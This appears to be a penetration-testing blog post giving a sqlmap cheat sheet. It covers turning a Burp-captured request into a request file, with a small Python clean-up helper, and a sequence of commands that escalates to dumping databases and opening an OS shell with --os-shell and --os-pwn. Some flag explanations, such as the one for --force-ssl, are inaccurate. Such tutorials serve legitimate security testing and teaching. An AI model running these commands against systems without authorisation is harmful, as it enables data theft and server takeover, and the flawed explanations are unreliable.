S1REN

Yeah, it's pretty useful.



I'm going to preface this with the fact that you will always want to find an endpoint with as many GET and POST parameters in a single query as possible. Being able to iterate through multiple parameters recursively to test for Input Sanitization is extremely powerful during an engagement.

The more the merrier.

S1REN, Will you-
Will I cover SQL Injection in a future blog post?
Who knows!
Who can say!?

[ sqlmap ]
https://tools.kali.org/vulnerability-analysis/sqlmap

[ + ] SQLMAP AND POST DATA:
--> Intercept HTTP POST request in Burp.
--> touch request.txt
--> nano request.txt
--> paste.
--> Remove each extra \r\n (carriage return and newline; it usually shows up as a blank line after each header...)
--> sqlmap -r request.txt
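As an added example (not part of the original post and not sqlmap's own code): a small Python helper that does the clean-up step above on a request pasted from Burp, producing a file sqlmap -r accepts (CRLF line endings, exactly one blank line between headers and body, a recomputed Content-Length) and listing the GET and POST parameter names so you can pick a -p target. The sample request is constructed, with a deliberately wrong Content-Length.

```python
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: what a request pasted from Burp into nano often looks like,
# with stray "\r" characters, an extra blank line after the headers and a stale
# Content-Length (the body is really 9 bytes).
RAW_REQUEST = (
    "POST /superDuperCMS.php?p1=a&p2=b HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 11\r\n"
    "\r\n"
    "\r\n"
    "p3=c&p4=d\r\n"
)


def normalize_request(raw: str) -> str:
    """Return a request file sqlmap -r accepts: CRLF line endings, exactly one
    blank line between headers and body, no trailing blank lines."""
    lines = [ln.rstrip("\r") for ln in raw.split("\n")]
    # The first empty line marks the end of the header block.
    sep = lines.index("") if "" in lines else len(lines)
    headers = lines[:sep]
    body_text = "\r\n".join(ln for ln in lines[sep:] if ln != "")
    if body_text:
        # Keep Content-Length honest after the clean-up.
        headers = [
            f"Content-Length: {len(body_text)}"
            if ln.lower().startswith("content-length:") else ln
            for ln in headers
        ]
    out = "\r\n".join(headers) + "\r\n\r\n"
    if body_text:
        out += body_text + "\r\n"
    return out


def list_parameters(request: str) -> dict:
    """Return {'GET': [...], 'POST': [...]} parameter names in a normalized
    request, so a single injection point can be chosen with -p."""
    head, _, body = request.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    _method, target, _version = request_line.split(" ", 2)
    get_params = [k for k, _ in parse_qsl(urlsplit(target).query, keep_blank_values=True)]
    post_params = [k for k, _ in parse_qsl(body.strip(), keep_blank_values=True)]
    return {"GET": get_params, "POST": post_params}


if __name__ == "__main__":
    fixed = normalize_request(RAW_REQUEST)
    print(fixed, end="")
    print(list_parameters(fixed))
```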

[ + ] Optionally:
--> --dbms=mysql (Specify the Database Management System to save a LOT of time with SQLMAP...)
--> --threads=2 (Specify more threads if you wish - I find two to be fine.)
--> --time-sec=10 (In the event of time-based SQLi Queries - make the sleep time to 10 seconds...)
--> --level=2 (Specify the level for SQLMAP - it goes to a maximum of 5 levels.)
--> --risk=2 (Risk goes up to 3 at max.)
--> --technique=T (Restrict testing to time-based blind injection; a value of 'B' would restrict it to boolean-based blind injection instead, which is heavier in terms of query volume.)
--> --force-ssl (Some modern databases themselves require SSL Protocol.)
--> --dbs (Enumerate the database names)
--> -D <database name> (Found a Database Name? Tell SQLMap which one you're interested in.)

[ + ] All Together for request.txt:
sqlmap -r request.txt
sqlmap -r request.txt --threads=2
sqlmap -r request.txt --threads=2 --time-sec=10
sqlmap -r request.txt --threads=2 --time-sec=10 --level=2
sqlmap -r request.txt --threads=2 --time-sec=10 --level=2 --risk=2
sqlmap -r request.txt --threads=2 --time-sec=10 --level=2 --risk=2 --force-ssl
sqlmap -r request.txt --threads=2 --time-sec=10 --level=2 --risk=2 --force-ssl --dump
sqlmap -r request.txt --threads=2 --time-sec=10 --level=2 --risk=2 --force-ssl --dump --os-shell
sqlmap -r request.txt --threads=2 --time-sec=10 --level=2 --risk=2 --force-ssl --dump --os-pwn

[ + ] On your URL Environment Variable :
sqlmap -u $URL --threads=2 --time-sec=10 --level=2 --risk=2 --technique=T --force-ssl
--> or
sqlmap -u $URL --threads=2 --time-sec=10 --level=2 --risk=2 --technique=B --force-ssl

[ + ] Need to specify the DBMS?
--dbms=<DBMS>
--dbms=mysql
--dbms=mssql
--> etc.

[ + ] Dump all the data we get to the terminal, please.
--dump

[ + ] If the DBMS is configured to permit I/O operations (specifically output) - Shell:
--os-shell

[ + ] Specify a specific parameter to Test (i.e. I want to test parameter9 rather than parameters1-8 as I know that's where the injection point is already).
--> export URL="http://127.0.0.1:80/superDuperCMS.php?p1=DATA&p2=DATA&p3=DATA&p4=INJECTABLE-POINT"
sqlmap -u $URL --threads=2 --risk=2 --level=3 --dbms=<DBMS> -p p4